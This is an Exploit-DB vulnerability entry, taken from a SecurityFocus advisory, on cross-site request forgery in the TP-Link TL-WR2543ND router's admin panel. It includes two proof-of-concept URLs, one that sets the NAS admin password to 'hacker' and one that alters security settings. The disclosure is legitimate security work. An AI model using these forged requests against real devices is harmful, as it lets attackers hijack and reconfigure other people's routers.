TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities

EDB-ID:

38308

CVE:

N/A




Platform:

Hardware

Date:

2013-02-08


source: https://www.securityfocus.com/bid/57877/info

TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. 

Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions. 

TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.

http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save

http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save